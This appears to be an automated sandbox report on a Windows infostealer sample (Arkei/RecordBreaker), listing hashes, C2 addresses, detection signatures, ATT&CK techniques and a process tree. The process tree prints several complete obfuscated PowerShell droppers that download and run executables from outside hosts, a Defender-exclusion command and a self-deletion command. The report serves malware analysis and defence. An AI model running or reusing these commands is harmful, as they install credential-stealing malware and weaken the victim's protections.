arkei | a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3

Analysis

max time kernel
144s
max time network
127s
platform
windows7_x64
resource
win7-20220414-en
submitted
25/06/2022, 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
Size

1.9MB
MD5

b0b47d69cc54b277235b470ba486c710
SHA1

c7f46aba6a3c8b929f322585dc162ae98129221d
SHA256

a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3
SHA512

5565c09d98017f3eb1065bbd1c3d7870a41e29597ed17f39eaebabc4cd1ee7255ef817a15643cc32ededacebfdeee4ebf7bcc5f08cfa55b50c48cf3e40392d9a

Score

10^/10

arkei recordbreaker default discovery spyware stealer suricata

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://cutt.ly/zeyHqyH

exe.dropper

http://cutt.ly/zeyHqyH

Extracted

Family

recordbreaker

http://136.244.65.99/

http://140.82.52.55/

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
RecordBreaker
RecordBreaker is an information stealer capable of downloading and executing secondary payloads written in C++.
stealer recordbreaker
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata

Blocklisted process makes network request 7 IoCs

flow	pid	Process
6	1820	powershell.exe
7	1820	powershell.exe
8	1820	powershell.exe
10	1928	powershell.exe
13	456	powershell.exe
19	1736	powershell.exe
21	1736	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
940	_outputcrack.exe
1592	huy.exe
1532	lau.exe
1920	fcvtee.exe
736	lau.exe
1660	fcvtee.exe
1760	Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
1976	huy.exe
1984	huy.exe
1656	huy.exe
1776	huy.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation	huy.exe

Loads dropped DLL 10 IoCs

pid	Process
2044	cmd.exe
2044	cmd.exe
1928	powershell.exe
1736	powershell.exe
1736	powershell.exe
1532	lau.exe
1532	lau.exe
1660	fcvtee.exe
1660	fcvtee.exe
1592	huy.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1532 set thread context of 736	1532	lau.exe	60
PID 1920 set thread context of 1660	1920	fcvtee.exe	61
PID 1592 set thread context of 1776	1592	huy.exe	71

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	fcvtee.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	fcvtee.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
928	timeout.exe
1884	timeout.exe
2012	timeout.exe
1200	timeout.exe
1980	timeout.exe
1352	timeout.exe
1144	timeout.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1820	powershell.exe
1928	powershell.exe
456	powershell.exe
1928	powershell.exe
1928	powershell.exe
288	powershell.exe
1736	powershell.exe
1820	powershell.exe
1736	powershell.exe
1736	powershell.exe
1904	powershell.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe
1592	huy.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1532	lau.exe
1920	fcvtee.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	456	powershell.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	1592	huy.exe
Token: SeDebugPrivilege	1904	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1532	lau.exe
1920	fcvtee.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1464 wrote to memory of 2044	1464	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	27
PID 1464 wrote to memory of 2044	1464	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	27
PID 1464 wrote to memory of 2044	1464	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	27
PID 1464 wrote to memory of 2044	1464	a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe	27
PID 2044 wrote to memory of 940	2044	cmd.exe	29
PID 2044 wrote to memory of 940	2044	cmd.exe	29
PID 2044 wrote to memory of 940	2044	cmd.exe	29
PID 2044 wrote to memory of 940	2044	cmd.exe	29
PID 940 wrote to memory of 1060	940	_outputcrack.exe	30
PID 940 wrote to memory of 1060	940	_outputcrack.exe	30
PID 940 wrote to memory of 1060	940	_outputcrack.exe	30
PID 940 wrote to memory of 1060	940	_outputcrack.exe	30
PID 1060 wrote to memory of 1980	1060	cmd.exe	32
PID 1060 wrote to memory of 1980	1060	cmd.exe	32
PID 1060 wrote to memory of 1980	1060	cmd.exe	32
PID 1060 wrote to memory of 1980	1060	cmd.exe	32
PID 1060 wrote to memory of 1196	1060	cmd.exe	33
PID 1060 wrote to memory of 1196	1060	cmd.exe	33
PID 1060 wrote to memory of 1196	1060	cmd.exe	33
PID 1060 wrote to memory of 1196	1060	cmd.exe	33
PID 1060 wrote to memory of 1352	1060	cmd.exe	34
PID 1060 wrote to memory of 1352	1060	cmd.exe	34
PID 1060 wrote to memory of 1352	1060	cmd.exe	34
PID 1060 wrote to memory of 1352	1060	cmd.exe	34
PID 1196 wrote to memory of 1820	1196	mshta.exe	35
PID 1196 wrote to memory of 1820	1196	mshta.exe	35
PID 1196 wrote to memory of 1820	1196	mshta.exe	35
PID 1196 wrote to memory of 1820	1196	mshta.exe	35
PID 1060 wrote to memory of 572	1060	cmd.exe	37
PID 1060 wrote to memory of 572	1060	cmd.exe	37
PID 1060 wrote to memory of 572	1060	cmd.exe	37
PID 1060 wrote to memory of 572	1060	cmd.exe	37
PID 1060 wrote to memory of 1144	1060	cmd.exe	38
PID 1060 wrote to memory of 1144	1060	cmd.exe	38
PID 1060 wrote to memory of 1144	1060	cmd.exe	38
PID 1060 wrote to memory of 1144	1060	cmd.exe	38
PID 572 wrote to memory of 1928	572	mshta.exe	39
PID 572 wrote to memory of 1928	572	mshta.exe	39
PID 572 wrote to memory of 1928	572	mshta.exe	39
PID 572 wrote to memory of 1928	572	mshta.exe	39
PID 1060 wrote to memory of 1492	1060	cmd.exe	41
PID 1060 wrote to memory of 1492	1060	cmd.exe	41
PID 1060 wrote to memory of 1492	1060	cmd.exe	41
PID 1060 wrote to memory of 1492	1060	cmd.exe	41
PID 1060 wrote to memory of 928	1060	cmd.exe	42
PID 1060 wrote to memory of 928	1060	cmd.exe	42
PID 1060 wrote to memory of 928	1060	cmd.exe	42
PID 1060 wrote to memory of 928	1060	cmd.exe	42
PID 1492 wrote to memory of 456	1492	mshta.exe	43
PID 1492 wrote to memory of 456	1492	mshta.exe	43
PID 1492 wrote to memory of 456	1492	mshta.exe	43
PID 1492 wrote to memory of 456	1492	mshta.exe	43
PID 1928 wrote to memory of 1592	1928	powershell.exe	46
PID 1928 wrote to memory of 1592	1928	powershell.exe	46
PID 1928 wrote to memory of 1592	1928	powershell.exe	46
PID 1928 wrote to memory of 1592	1928	powershell.exe	46
PID 1060 wrote to memory of 1972	1060	cmd.exe	47
PID 1060 wrote to memory of 1972	1060	cmd.exe	47
PID 1060 wrote to memory of 1972	1060	cmd.exe	47
PID 1060 wrote to memory of 1972	1060	cmd.exe	47
PID 1060 wrote to memory of 1884	1060	cmd.exe	48
PID 1060 wrote to memory of 1884	1060	cmd.exe	48
PID 1060 wrote to memory of 1884	1060	cmd.exe	48
PID 1060 wrote to memory of 1884	1060	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe
"C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\AAC.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\a28b0824e48b4ca32608126458bd5d345015cd5c2e380d479d7e43d72611fcc3.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe
    _outputcrack.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\D5A.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\_outputcrack.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1980
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\m.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:1196
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wgcxnm $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wgcxnm syfpbmd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|syfpbmd;wgcxnm zkfwidtoglep $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2N1dHQubHkvemV5SHF5SA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkfwidtoglep $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1352
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\m1.hta"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:572
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwlunt $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwlunt tawoxvyelijpum $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tawoxvyelijpum;fwlunt fsqevtxyumpr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2FzZHNhZGFzcmRjLnVnL2FzZGZnLmV4ZQ==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);fsqevtxyumpr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1928
        
        C:\Users\Public\huy.exe
        
        "C:\Users\Public\huy.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Fvmidruhvvwkpvmfzdjkqkyhgrn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Fvmidruhvvwkpvmfzdjkqkyhgrn.exe"
        8⤵
        Executes dropped EXE
        
        PID:1760
        
        C:\Users\Public\huy.exe
        
        C:\Users\Public\huy.exe
        8⤵
        Executes dropped EXE
        
        PID:1976
        
        C:\Users\Public\huy.exe
        
        C:\Users\Public\huy.exe
        8⤵
        Executes dropped EXE
        
        PID:1656
        
        C:\Users\Public\huy.exe
        
        C:\Users\Public\huy.exe
        8⤵
        Executes dropped EXE
        
        PID:1776
        
        C:\Users\Public\huy.exe
        
        C:\Users\Public\huy.exe
        8⤵
        Executes dropped EXE
        
        PID:1984
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1144
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\b.hta"
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of WriteProcessMemory
        
        PID:1492
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fydir $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fydir bqzfr $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bqzfr;fydir htfdxvgcn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3Rpbnl1cmwuY29tL3kzcDc3dWZl';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);htfdxvgcn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 4
        5⤵
        Delays execution with timeout.exe
        
        PID:928
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\b1.hta"
        5⤵
        Modifies Internet Explorer settings
        
        PID:1972
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL saduxocqtzmby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;saduxocqtzmby imgbedtwlzyok $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|imgbedtwlzyok;saduxocqtzmby evgskhmqljibn $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL21hcmFsc2tkcy51Zy9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);evgskhmqljibn $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1884
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\ba.hta"
        5⤵
        Modifies Internet Explorer settings
        
        PID:1176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lnkdvtwhojby $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lnkdvtwhojby tehacx $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tehacx;lnkdvtwhojby zkvslpeiwac $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9mYnNjaw==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);zkvslpeiwac $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Users\Public\lau.exe
        
        "C:\Users\Public\lau.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:1532
        
        C:\Users\Admin\AppData\Roaming\fcvtee.exe
        
        "C:\Users\Admin\AppData\Roaming\fcvtee.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:1920
        
        C:\Users\Admin\AppData\Roaming\fcvtee.exe
        
        "C:\Users\Admin\AppData\Roaming\fcvtee.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Roaming\fcvtee.exe" & exit
        10⤵
        
        PID:432
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        11⤵
        Delays execution with timeout.exe
        
        PID:1200
        
        C:\Users\Public\lau.exe
        
        "C:\Users\Public\lau.exe"
        8⤵
        Executes dropped EXE
        
        PID:736
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 6
        5⤵
        Delays execution with timeout.exe
        
        PID:2012
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D5A.tmp\ba1.hta"
        5⤵
        Modifies Internet Explorer settings
        
        PID:1784
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL lpyeqrz $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;lpyeqrz dpwges $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|dpwges;lpyeqrz ynlpmogafidr $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL3BhaXBhaXNkdnp4Yy5ydS9hc2RmZy5leGU=';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);ynlpmogafidr $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AAC.tmp\start2.bat

Filesize
69B

MD5
e98d4e29be5a27f8aff16b61369e5b88

SHA1
f1819a3d9329cea8d1603143bb81efd0a0404cd4

SHA256
af355683e78c8fa03f49c0621890eff7ee3ed2d9507ae45361a7ee271f20b74d

SHA512
ade3ad78ecbb269124df78400b6376af21baf6246b101a9332eacf4271ce40d88ba3f42fc5f772f7dd69d7bb941fa55be68b1a6b1883f47782a2c55bc115e2d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\D5A.tmp\b.hta

Filesize
11KB

MD5
2c81f1d8d202dfaa50534d7401324fce

SHA1
955ec5779d4d4cba14e98ed14fa3f474c36d059a

SHA256
c0b1c6c1380abb47f9fd7ca7728149f0b6a2f56119116b7ad31d1df1678723cd

SHA512
1a84fc615a3829f7feb94558b2afe95c8b43942212dd7deb7b5103ac4a35afbb59da8504692972d8da8b6e744eb78efdf28cfea1df6c9dce5f536149c40916f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\D5A.tmp\b1.hta

Filesize
11KB

MD5
5cee90fba6052aa18555a5aedb6545a2

SHA1
4dac96e8a4858ef748c4a23dea441c2d0c90737c

SHA256
ab44c1f385c343483d3213ae8c226f9a023ee5803bb07d5a85fb62aa3a0313d8

SHA512
